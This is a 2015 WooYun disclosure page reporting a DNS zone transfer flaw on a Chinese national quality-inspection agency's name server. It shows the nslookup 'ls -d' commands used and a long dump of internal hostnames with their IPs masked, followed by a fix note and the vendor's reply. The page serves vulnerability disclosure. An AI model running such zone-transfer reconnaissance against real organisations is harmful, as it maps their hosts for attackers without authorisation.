当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140642

漏洞标题:国家质量监督检验检疫总局域传送(国家级)

相关厂商:国家质量监督检验检疫总局

漏洞作者: 路人甲

提交时间:2015-09-17 11:47

修复时间:2015-11-02 15:44

公开时间:2015-11-02 15:44

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-17: 细节已通知厂商并且等待厂商处理中
2015-09-18: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-28: 细节向核心白帽子及相关领域专家公开
2015-10-08: 细节向普通白帽子公开
2015-10-18: 细节向实习白帽子公开
2015-11-02: 细节向公众公开

简要描述:

域传送漏洞的危害:黑客可以快速的判定出某个特定zone的所有主机,收集域信息,选择攻
击目标,找出未使用的IP地址,黑客可以绕过基于网络的访问控制

详细说明:

0x01:主站地址

http://**.**.**.**/


0x02:漏洞证明

C:\Users\Administrator>nslookup
默认服务器: **.**.**.**
Address: **.**.**.**
> set type=ns
> **.**.**.**
服务器: **.**.**.**
Address: **.**.**.**
非权威应答:
**.**.**.** nameserver = dns1.**.**.**.**
**.**.**.** nameserver = dns.**.**.**.**
**.**.**.** nameserver = odnssvr.**.**.**.**
> server dns.**.**.**.**
默认服务器: dns.**.**.**.**
Address: **.**.**.**
> ls -d **.**.**.**


0x03:泄露大量信息:

> ls -d **.**.**.**
[dns.**.**.**.**]
**.**.**.**. SOA linux.site root.linux.site. (2008011803 1
0800 3600 604800 86400)
**.**.**.**. MX 10 mail.**.**.**.**
**.**.**.**. NS dns.**.**.**.**
**.**.**.**. NS dns1.**.**.**.**
**.**.**.**. NS odnssvr.**.**.**.**
admission A **.**.**.**
admission A **.**.**.**
al-b2 A **.**.**.**
al-f2 A **.**.**.**
appserver A **.**.**.**
aqsiq A **.**.**.**
avirussvr2 A **.**.**.**
bgt A **.**.**.**
bgt A **.**.**.**
big5 A **.**.**.**
big5 A **.**.**.**
ciq A **.**.**.**
cpzljds A **.**.**.**
cpzljds A **.**.**.**
cqs A **.**.**.**
dcnss A **.**.**.**
dcnss A **.**.**.**
dhcpserver A **.**.**.**
dns A **.**.**.**
dns1 A **.**.**.**
dzwjyjgs A **.**.**.**
dzwjyjgs A **.**.**.**
edu A **.**.**.**
edu A **.**.**.**
english A **.**.**.**
english A **.**.**.**
ent2 A **.**.**.**
etnet A **.**.**.**
etnet A **.**.**.**
famm A **.**.**.**
famm A **.**.**.**
fgs A **.**.**.**
fgs A **.**.**.**
gjhzs A **.**.**.**
gjhzs A **.**.**.**
gp A **.**.**.**
gw A **.**.**.**
gw A **.**.**.**
gwy A **.**.**.**
gwy A **.**.**.**
gyxkz A **.**.**.**
ic A **.**.**.**
ic A **.**.**.**
idssvr A **.**.**.**
iga A **.**.**.**
imss A **.**.**.**
interview A **.**.**.**9
interview A **.**.**.**9
is-ent2 A **.**.**.**
jbjs A **.**.**.**
jcj A **.**.**.**
jcj A **.**.**.**
jckspaqj A **.**.**.**
jckspaqj A **.**.**.**
jgdw A **.**.**.**
jgdw A **.**.**.**
jhcws A **.**.**.**
jhcws A **.**.**.**
jjd A **.**.**.**
jls A **.**.**.**
jls A **.**.**.**
jyjgs A **.**.**.**
jyjgs A **.**.**.**
kjs A **.**.**.**
kjs A **.**.**.**
kuai CNAME kuai.**.**.**.**.cloudcdn.net
label A **.**.**.**
label A **.**.**.**
le2 A **.**.**.**
ltxgbj A **.**.**.**
ltxgbj A **.**.**.**
lyzl A **.**.**.**
lyzl A **.**.**.**
m A **.**.**.**
m A **.**.**.**
m A **.**.**.**
mail A **.**.**.**
mm-b2 A **.**.**.**
mm-f2 A **.**.**.**
mm2 A **.**.**.**
mrss A **.**.**.**
mrss A **.**.**.**
mrss A **.**.**.**
odnssvr A **.**.**.**
owebsvr A **.**.**.**
pc-manager A **.**.**.**
pop3 A **.**.**.**
psi A **.**.**.**
psi A **.**.**.**
psi1 A **.**.**.**
psi1 A **.**.**.**
psi2 A **.**.**.**
psi2 A **.**.**.**
psiap A **.**.**.**
psiap A **.**.**.**
psihr A **.**.**.**
psihr A **.**.**.**
psiinfo A **.**.**.**
qas A **.**.**.**
qc2 A **.**.**.**
qs2 A **.**.**.**
report A **.**.**.**8
report A **.**.**.**8
rss A **.**.**.**
rss A **.**.**.**
se2 A **.**.**.**
search A **.**.**.**
sesa A **.**.**.**
sesa A **.**.**.**
sf2 A **.**.**.**
smtp A **.**.**.**
spscjgs A **.**.**.**
spscjgs A **.**.**.**
sus A **.**.**.**
test A **.**.**.**
test A **.**.**.**
tgyws A **.**.**.**
tgyws A **.**.**.**
tzsbaqjcj A **.**.**.**
tzsbaqjcj A **.**.**.**
v A **.**.**.**
v A **.**.**.**
video A **.**.**.**
vweb A **.**.**.**
vweb A **.**.**.**
vwebsvr A **.**.**.**
vwebsvr A **.**.**.**
wap A **.**.**.**
wap A **.**.**.**
wsjyjgs A **.**.**.**
wsjyjgs A **.**.**.**
www A **.**.**.**
www A **.**.**.**
www1 A **.**.**.**
www1 A **.**.**.**
xxb A **.**.**.**
xxb A **.**.**.**
xxzx A **.**.**.**
xxzx A **.**.**.**
xxzx A **.**.**.**
zfdcs A **.**.**.**
zfdcs A **.**.**.**
zjkygl A **.**.**.**
zjzj2 A **.**.**.**
zjzj2 A **.**.**.**
zjzwxxgl A **.**.**.**
zlgls A **.**.**.**
zlgls A **.**.**.**
zlxy A **.**.**.**7
zlxy A **.**.**.**7
zsdwjx A **.**.**.**
zy A **.**.**.**
zy A **.**.**.**
**.**.**.**. SOA linux.site root.linux.site. (2008011803 1
0800 3600 604800 86400)


0x04:截图证明

域传送.png


漏洞证明:

域传送.png

修复方案:

国家的门面,这样的漏洞还是少点比较好吧,并且修复起来也不是什么难事。么么哒,加油
关于修复,建议看一下这理提到的:
http://**.**.**.**/Article/201204/125817.html
http://**.**.**.**/u013648937/article/details/48215157

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-09-18 15:42

厂商回复:

此前测试已经发现,rank5

最新状态:

暂无